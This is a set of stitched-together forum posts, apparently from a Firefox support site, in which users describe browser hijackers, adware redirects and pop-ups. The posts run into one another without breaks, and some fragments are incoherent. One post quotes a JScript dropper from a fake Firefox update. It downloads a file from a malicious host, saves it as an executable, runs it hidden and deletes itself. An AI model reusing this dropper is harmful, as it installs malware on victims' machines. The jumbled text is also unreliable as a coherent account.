Hi all. I had to reinstall my Windows 10 OS on my laptop today after interruption to auto windows update and on reinstalling Firefox I somehow managed to pick up the Foxstart browser hijacker. I have searched and worked through various solutions on here and elsewhere and none of them work.

My old Bookmarks work and take me direct to sites but when I undertake a search in Firefox I get taken to the Foxstart browser and despite removing, reinstalling Firefox, running adaware SE, superantispyware, malware bytes etc etc, the problem still persists.

I cant see anything in addons/plugins etc.

Please help me to remove it! many thanks

They were reinstalled when I rebooted. 2) I have to reset the Google search settings 3) I have to reset the Add-ons (either reinstall them or reset the activation settings)

There are probably some other things I haven't noticed because I haven't tried to use the affected feature.

I have Windows 10. I have a current subscription to McAfee through Time Warner Cable and I downloaded "Malwarebytes Anti-Malware" I don't stray from Yahoo, Outlook,Aol and a few shopping websites. I did however download "My Turbo PC" to try to solve my browser freezing but I didn't buy the unlock key. My "spyware" "malware" or "virus" problem didn't start until "My Turbo PC".

Can anyone please help me get the unwanted program off of my computer please?

Thank you.

I have "ask" malware appearing everywhere. I have sought "ask" programs or files and I cannot find any , but "ask" appears on my searches. It is really annoying. I renewed my my operating system and have been careful not to inadvertently allow "ask" to fit itself in new apps. I am using Windows 10 with Mozilla Firefox as my browser. All are current.

I have tired to use a program called Searchreset 0.3, but I can't get a response from it. I search for "ASK" but I can't find anything to remove. I don't seem to have it's toolbar, but it is on any search. I have restored the operating system and have not knowingly exposed myself to "ASK". I don't want it to ever appear on my scree; can anyone help?

Dear sirs, In my computer is running Windows XP, for example, to be able to use old AutoCAD software, I do not want to change, but I have downloaded the servicepack3 to it and then using Firefox, right from the time I connect,a variety of annoying ads and even pages loaded up, I do not even clicked on it. Initially, I thought that a virus might have infected my computer, I think this was solved. After that, I started to use the Opera browser and under it was not be made these very annoying, disturbing phenomena, so I think that Mozilla Firefox is under an attack on side and I wanted to indicate it to You. One of my friends downloaded a virus onto my pc, and I used malwarebytes to get rid of it. Although, when I open Firefox, or any internet browser, http://trustedsurf.com/?ssid=1458266251&a=1040936&src=sh&uuid=375dea8b-9c00-4387-884e-aa4571cc6d38 comes up despite any settings I change. I realize that it is giving me more viruses and it is annoying to have to run malwarebytes so often. I have already checked my extensions and reinstalled Firefox. Any ideas on how to remove this?

Since installing Firefox 47 I've noticed that, in addition to the usual "Transferring data from..." and "Waiting for..." messages that I'm used to seeing at the bottom of a Firefox window, I am now seeing "Read..." messages at the bottom of the window, which I don't recall seeing in previous versions of Firefox. I've also noticed a corresponding slow down in my web browsing speed since the "Read..." messages started appearing. My question is, what do the "Read..." messages mean and could they be connected to the web browsing slowdown I've noticed? I've tried running Firefox is in safe mode, but doing this seems to provide only a temporary fix for the speed issues.

I have a .js file and .dat file that I snagged when a Urgent Firefox Update message popped up. This urgent update looked very Firefox Official. I noticed the redirect URL and it was: https://queidwhoreslag.net/9751229892037/e9e0075191d8aac19e485315d1b67c26.html. So I saved the .js file on one of my other computers and snagged some other stuff from their API. I have the malware code that is Firefox directed. Just need to know where to send the compressed files. Below is a glimpse at some of the .js code:

url='https://queidwhoreslag.net/10/524.dat';

fname=b.GetSpecialFolder(2)+'\\1e90999f64aa011197bfdf7c1792c61b.exe';
for(var i=1;i<=5;i++)
{

try { c.open('GET', url, false); c.send(null); break; }

    catch(e){

WScript.Sleep(5000); }

}
d.Open;
d.Type = 1;
d.Write(c.ResponseBody);
d.Position=0;
if (b.Fileexists(fname))b.DeleteFile(fname);
d.SaveToFile(fname);
a.run('cmd.exe /c "'+fname+'"',0,false);
var p = WScript.ScriptFullName;
if (b.FileExists(p))b.DeleteFile(p);
WScript.Echo('Update complete.');
} catch (e) {}

been on this for a while now, to be honest if this doesn't get me the solution im going to use another browser.

I don't have this issue with safari, I use a macbook.

when i try to close tabs, a pop up remains, they are either a fake apple support window, or a mackeeper equivalent, or other financial things. Occasionally when I click on a link, it ignores the link and opens a pop up in its place. These pop ups are like normal windows rather than extra windows that run over - i.e they replace either a tab i am closing or act in place of one. They are just annoying.

here is one of them>http://www.reimagemac.com/mac/?tracking=ReimageNetworkCon&banner=Roleta&adgroup=832297&ads_name=1022637&keyword=direct&context=v1_7937237_215037_36p_12AD2FB5E1895806231228951518_-1_4060467_v6ld_778_12AD2FB5E1895806227908775_m_ju_-5964032012024961844_832297____72_4d9f_ju_

I have checked add ons, as it seems like its something that i may of accidentally downloaded as part of a software download and maybe havent deleted etc, but no

I have definitely got my add blocker active and have downloaded an additional add on in response to the issue, to no avail

I did find a way of getting into another preferences part which listed various sites, i typed in something :preferences into the address bar, but am unable to go back in - if that is what it way anyway.

hopefully there is a resolution
